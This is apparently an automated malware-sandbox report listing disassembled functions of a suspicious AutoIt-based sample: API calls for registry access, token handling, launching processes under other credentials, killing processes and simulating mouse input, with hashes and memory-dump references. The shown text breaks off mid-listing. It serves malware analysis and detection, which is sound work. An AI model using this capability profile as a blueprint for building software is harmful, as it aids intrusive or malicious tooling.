                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$__itow__swprintf
                      • String ID:
                      • API String ID: 3253778849-0
                      • Opcode ID: 8cbfe9821565179410f19b525838424f4bfd1a05df102c2ca956a903836ec576
                      • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                      • Opcode Fuzzy Hash: 8cbfe9821565179410f19b525838424f4bfd1a05df102c2ca956a903836ec576
                      • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                      • String ID:
                      • API String ID: 4046560759-0
                      • Opcode ID: 163d3c4affa51dac83ce02df1c8336ece114573e68c7f47e9183a6863d30b492
                      • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                      • Opcode Fuzzy Hash: 163d3c4affa51dac83ce02df1c8336ece114573e68c7f47e9183a6863d30b492
                      • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 0045EF06
                      • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                      • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                      • _memmove.LIBCMT ref: 0045EFFD
                      • VariantClear.OLEAUT32(?), ref: 0045F04A
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$Clear$ChangeInitType_memmove
                      • String ID:
                      • API String ID: 1101466143-0
                      • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                      • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                      • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                      • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                      APIs
                      • _memset.LIBCMT ref: 00462258
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                      • IsMenu.USER32(00000000), ref: 004622C3
                      • CreatePopupMenu.USER32 ref: 004622F7
                      • GetMenuItemCount.USER32(000000FF), ref: 00462355
                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                      • String ID:
                      • API String ID: 3311875123-0
                      • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                      • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                      • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                      • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                      APIs
                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                        • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                      • GetDesktopWindow.USER32 ref: 004770D6
                      • GetWindowRect.USER32(00000000), ref: 004770DD
                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                        • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                      • GetCursorPos.USER32(?), ref: 0047713B
                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                      • String ID:
                      • API String ID: 4137160315-0
                      • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                      • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                      • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                      • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                      APIs
                        • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                        • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                        • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                        • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                        • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                      • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                      • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                      • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                      • HeapFree.KERNEL32(00000000), ref: 00458911
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                      • String ID:
                      • API String ID: 3008561057-0
                      • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                      • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                      • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                      • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                      APIs
                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                      • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                      • CloseHandle.KERNEL32(00000004), ref: 00458603
                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                      • String ID:
                      • API String ID: 1413079979-0
                      • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                      • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                      • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                      • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: ec9ab533e69af6e14dd705bc0aa0ce4241f45d05ec8671b7253d53fe0246ef88
                      • Instruction ID: b9a88f2fa9e3e6caa7d80e4debbb9f9d7c293f25dab5d54d589b79140e592211
                      • Opcode Fuzzy Hash: ec9ab533e69af6e14dd705bc0aa0ce4241f45d05ec8671b7253d53fe0246ef88
                      • Instruction Fuzzy Hash: 47F0F43698060636FF122736AC08F2B32579BC1BE1B240634FB1D92290EF6288169910
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                      • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                      • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                      • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                      • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                      • String ID:
                      • API String ID: 839392675-0
                      • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                      • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                      • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                      • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                      APIs
                      • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                      • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                      • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                        • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                      • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                      • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                      • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                      • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                      • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                      • CloseHandle.KERNEL32(?), ref: 004589B2
                      • CloseHandle.KERNEL32(?), ref: 004589BA
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                      • HeapFree.KERNEL32(00000000), ref: 004589CA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                      • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                      • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                      • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                      APIs
                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                      • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                      • _memcmp.LIBCMT ref: 00457748
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FromProg$FreeTask_memcmp
                      • String ID: ,,I
                      • API String ID: 314563124-4163367948
                      • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                      • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                      • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                      • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00478613
                      • CharUpperBuffW.USER32(?,?), ref: 00478722
                      • VariantClear.OLEAUT32(?), ref: 0047889A
                        • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                        • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                        • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                      • API String ID: 4237274167-1221869570
                      • Opcode ID: 7eb3f6cd446d25451a520632f830be0f78651e26610ae4c76cefc4e8c14cd634
                      • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                      • Opcode Fuzzy Hash: 7eb3f6cd446d25451a520632f830be0f78651e26610ae4c76cefc4e8c14cd634
                      • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                      APIs
                        • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                      • _memset.LIBCMT ref: 00462B87
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                      • String ID: 0
                      • API String ID: 4152858687-4108050209
                      • Opcode ID: 36020492c05a5bc8181169e2455f976669ac6635689806e7418e508e7bf96093
                      • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                      • Opcode Fuzzy Hash: 36020492c05a5bc8181169e2455f976669ac6635689806e7418e508e7bf96093
                      • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$_free
                      • String ID: 3cA$_A
                      • API String ID: 2620147621-3480954128
                      • Opcode ID: fc79bb831323697d85a5635729b3fd95b30c12d258a38a46f5bd99e813b77d49
                      • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                      • Opcode Fuzzy Hash: fc79bb831323697d85a5635729b3fd95b30c12d258a38a46f5bd99e813b77d49
                      • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memset$_memmove
                      • String ID: 3cA$ERCP
                      • API String ID: 2532777613-1471582817
                      • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                      • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                      • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                      • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                      APIs
                      • _memset.LIBCMT ref: 004627C0
                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem_memset
                      • String ID: 0
                      • API String ID: 1173514356-4108050209
                      • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                      • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                      • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                      • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$_memmove$ClassName
                      • String ID: ComboBox$ListBox
                      • API String ID: 365058703-1403004172
                      • Opcode ID: 41b172fb23dd49c8d8f52202ad798600498582b3503cd6c88b0e487f8b7c978c
                      • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                      • Opcode Fuzzy Hash: 41b172fb23dd49c8d8f52202ad798600498582b3503cd6c88b0e487f8b7c978c
                      • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                      APIs
                        • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                        • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                        • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                      • LoadLibraryW.KERNEL32(?), ref: 00486468
                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                      • DestroyWindow.USER32(?), ref: 00486485
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                      • String ID: SysAnimate32
                      • API String ID: 4146253029-1011021900
                      • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                      • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                      • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                      • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                      APIs
                      • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                      • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
